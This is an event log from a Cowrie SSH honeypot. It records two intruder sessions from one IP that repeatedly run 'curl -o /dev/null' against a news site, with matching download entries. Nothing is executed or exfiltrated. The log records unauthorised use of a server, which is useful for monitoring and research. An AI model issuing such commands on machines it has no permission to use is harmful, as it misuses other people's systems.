{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.957510Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.959821Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.960704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.963753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.965050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.968163Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.973175Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.977927Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.987658Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.001043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.002107Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.005665Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.006464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.033251Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.040538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.041806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.045830Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.047005Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.051086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.053536Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.058371Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.059965Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.061357Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.081904Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.083062Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.088988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.090136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.096197Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.105225Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.112212Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.121095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.121983Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.125739Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.127176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.127957Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.131320Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.147470Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.150957Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.161869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.162885Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.165298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.166054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.172415Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.183104Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.184822Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.201484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.202429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.204723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.205601Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.231675Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.244626Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.245910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.249332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.250243Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.253922Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.263526Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.265986Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.268458Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.281111Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.282198Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.290654Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.294069Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.295284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.319365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.320487Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.334278Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.335350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.355047Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.355996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.360591Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.378445Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.379964Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.380827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.393800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.394972Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.417557Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.420196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.421102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:43.429801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:43.430720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
